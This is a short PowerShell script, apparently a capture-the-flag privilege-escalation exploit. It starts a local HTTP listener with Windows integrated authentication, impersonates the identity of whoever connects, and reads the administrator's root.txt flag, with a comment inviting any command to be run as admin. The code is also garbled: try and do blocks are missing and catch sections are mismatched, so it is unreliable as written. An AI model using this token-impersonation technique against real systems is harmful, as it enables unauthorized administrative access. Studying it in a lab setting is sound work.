[System.Reflection.Assembly]::LoadWithPartialName("System.Web")
$listener = New-Object System.Net.HttpListener
$listener.Prefixes.Add("http://localhost:7000/")
$listener.AuthenticationSchemes = [System.Net.AuthenticationSchemes]::IntegratedWindowsAuthentication
Write-Host "Listening..."
$context = $listener.GetContext()
$requestUrl = $context.Request.Url
$response = $context.Response
$context.User.Identity.Impersonate()
# run any command as admin here
type C:\users\administrator\desktop\root.txt
} catch [System.UnauthorizedAccessException] {
$response.StatusCode = 401
$Content = [System.Text.Encoding]::UTF8.GetBytes("")
} catch [System.Management.Automation.ItemNotFoundException] {
$response.StatusCode = 404
$Content = [System.Text.Encoding]::UTF8.GetBytes("")
$Content = "$($_.InvocationInfo.MyCommand.Name) : $($_.Exception.Message)"
$Content += "$($_.InvocationInfo.PositionMessage)"
$Content += " + $($_.CategoryInfo.GetMessage())"
$Content += " + $($_.FullyQualifiedErrorId)"
$Content = [System.Text.Encoding]::UTF8.GetBytes($Content)
$response.StatusCode = 500
$response.ContentLength64 = $Content.Length
$response.OutputStream.Write($Content, 0, $Content.Length)
} while ($listener.IsListening)